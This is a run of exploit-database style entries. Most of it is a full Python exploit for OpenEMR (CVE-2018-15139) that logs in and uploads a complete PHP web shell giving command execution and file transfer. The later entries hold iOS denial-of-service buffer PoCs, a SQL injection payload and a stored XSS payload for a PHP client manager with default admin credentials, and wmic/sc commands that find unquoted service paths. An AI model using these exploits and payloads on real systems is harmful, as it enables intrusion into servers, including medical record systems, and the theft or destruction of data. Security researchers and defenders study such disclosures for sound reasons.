  19. # Exploit Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) # Date 12.06.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip # Version: Prior to 5.0.1.4 # Tested on: Ubuntu 18.04 # CVE: CVE-2018-15139 # CWE: CWE-434 # Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15139 ''' Description: Unrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload form and accessing it in the images directory. ''' ''' Banner: ''' banner =""" ___ _____ __ __ ____ ____ ___ _ _____ / _ \ _ __ ___ _ __ | ____| \/ | _ \ | ___| / _ \ / | |___ / | | | | '_ \ / _ \ '_ \| _| | |\/| | |_) | _____ |___ \| | | || | |_ \ | |_| | |_) | __/ | | | |___| | | | _ < |_____| ___) | |_| || |_ ___) | \___/| .__/ \___|_| |_|_____|_| |_|_| \_\ |____(_)___(_)_(_)____/ |_| _____ _ _ _ | ____|_ ___ __ | | ___ (_) |_ | _| \ \/ / '_ \| |/ _ \| | __| | |___ > <| |_) | | (_) | | |_ |_____/_/\_\ .__/|_|\___/|_|\__| |_| """ print(banner) ''' Import required modules ''' import argparse import requests ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='OpenEMR Remote Code Execution') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT openemr_path = args.PATH username = args.USERNAME password = args.PASSWORD ''' Authentication: ''' # Preparation: session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + openemr_path + 
'/interface/main/main_screen.php?auth=login&site=default' auth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default' response = session.get(auth_chek_url) # Header (auth): header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Referer': auth_chek_url, 'Upgrade-Insecure-Requests': '1', } # Body (auth): body = { 'new_login_session_management': '1', 'authProvider': 'Default', 'authUser': username, 'clearPass': password, 'languageChoice': '1' } # Authentication: print('') print('[+] Authentication') auth = session.post(auth_url,headers=header, data=body) ''' Exploit: ''' print('') print('[+] Uploading Webshell:') # URL: exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php' # Headers (Exploit): header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------31900464228840324774249185339", "Origin": "http://" + target_ip, "Connection": "close", "Referer": 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php', "Upgrade-Insecure-Requests": "1" } # Body (Exploit): body = "-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_filename\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; 
name=\"form_filedata\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n12000000\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_image\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => 
getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt 
{\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. 
Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? 
currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n 
_updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event 
|| window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_dest_filename\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_education\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"bn_save\"\r\n\r\nSave\r\n-----------------------------31900464228840324774249185339--\r\n" # Send Exploit: session.post(exploit_url, headers=header, data=body) # Finish path = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/images/shell.php' print('[+] Webshell: ' + path)
  20. # Exploit Title: Notex the best notes 6.4 - Denial of Service (PoC) # Date: 06-14-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/notex-the-best-notes/id847994217 # Version: 6.4 # Category: DoS (iOS) ##### Vulnerability ##### Notex – the best notes is vulnerable to a DoS condition when a very long string of characters is entered while creating a note: # STEPS # # Open the application. # Create a new Note. # Run the Python script payload.py; it creates a file named payload.txt. # Copy the content of the file "payload.txt". # Paste the content of payload.txt twice into the new Note. # The application crashes. Successful exploitation causes the application to stop working. This was tested on iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
  21. # Exploit Title: Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC) # Date: 06-14-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/secure-notepad-private-notes/id711178888 # Version: 3.0.3 # Category: DoS (iOS) ##### Vulnerability ##### Secure Notepad - Private Notes is vulnerable to a DoS condition when a very long string of characters is entered while creating a note: # STEPS # # Open the application. # Create a new Note. # Run the Python script payload.py; it creates a file named payload.txt. # Copy the content of the file "payload.txt". # Paste the content of payload.txt twice into the new Note. # The application crashes. Successful exploitation causes the application to stop working. This was tested on iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
  22. # Exploit Title: Post-it 5.0.1 - Denial of Service (PoC) # Date: 06-14-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/es/app/post-it/id920127738 # Version: 5.0.1 # Category: DoS (iOS) ##### Vulnerability ##### Post-it is vulnerable to a DoS condition when a very long string of characters is entered while creating a note: # STEPS # # Open the application. # Create a new Note. # Run the Python script payload.py; it creates a file named payload.txt. # Copy the content of the file "payload.txt". # Paste the content of payload.txt twice into the new Note. # The application crashes. Successful exploitation causes the application to stop working. This was tested on iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
  23. # Exploit Title: Client Management System 1.1 - 'Search' SQL Injection # Date: 14 June 2021 # Exploit Author: BHAVESH KAUL # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/ # Version: 1.1 # Tested on: Server: XAMPP # Description # Client Management System 1.1 is vulnerable to SQL injection in the admin panel's 'search invoices' field because of insufficient sanitization of user-supplied data. # Proof of Concept (PoC) : Exploit # 1) Go to: http://localhost/clientms/admin/index.php 2) Log in as admin using the test credentials: admin/Test@123 3) Go to: http://localhost/clientms/admin/search-invoices.php 4) Enter the following payload in the search field: ' OR 'x'='x 5) All results are shown instead of none, confirming the SQL injection.
  24. # Exploit Title: Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS) # Date: 14 June 2021 # Exploit Author: BHAVESH KAUL # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/ # Version: 1.1 # Tested on: Server: XAMPP # Description # Client Management System 1.1 is vulnerable to stored cross-site scripting because of insufficient sanitization of user-supplied data. # Proof of Concept (PoC) : Exploit # 1) Go to: http://localhost/clientms/admin/index.php 2) Log in as admin using the test credentials: admin/Test@123 3) Go to: http://localhost/clientms/admin/admin-profile.php 4) Enter the following payload in the user name field: <script>alert(1)</script> 5) Click on Update 6) The payload is stored and executes.
  25. # Exploit Title: Brother BRPrint Auditor 3.0.7 - 'Multiple' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 14-06-2021 # Vendor Homepage: https://support.brother.com/ # Software Links: https://support.brother.com/g/b/downloadhowto.aspx?c=us&lang=en&prod=dcp7060d_all&os=10013&dlid=dlf102753_000&flang=4&type3=214 # Tested Version: 3.0.7 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise # Steps to discover the unquoted service paths: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ BrPrAuSvc BrAuSvc C:\Program Files (x86)\Brother\BRPrintAuditor\Brsvau3a.exe Auto Brother BRPrintAuditor Agent BRPA_Agent C:\Program Files (x86)\Brother\BRPrintAuditor\BRAgtSrv.exe Auto C:\Users\IEUser>sc qc BrAuSvc [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: BrAuSvc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Brother\BRPrintAuditor\Brsvau3a.exe GRUPO_ORDEN_CARGA : BrotherSplGroup ETIQUETA : 0 NOMBRE_MOSTRAR : BrPrAuSvc DEPENDENCIAS : Spooler NOMBRE_INICIO_SERVICIO: LocalSystem C:\Users\IEUser>sc qc BRPA_Agent [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: BRPA_Agent TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Brother\BRPrintAuditor\BRAgtSrv.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Brother BRPrintAuditor Agent DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem As the output shows, both services start automatically, run as LocalSystem, and have binary paths that contain spaces but are not quoted.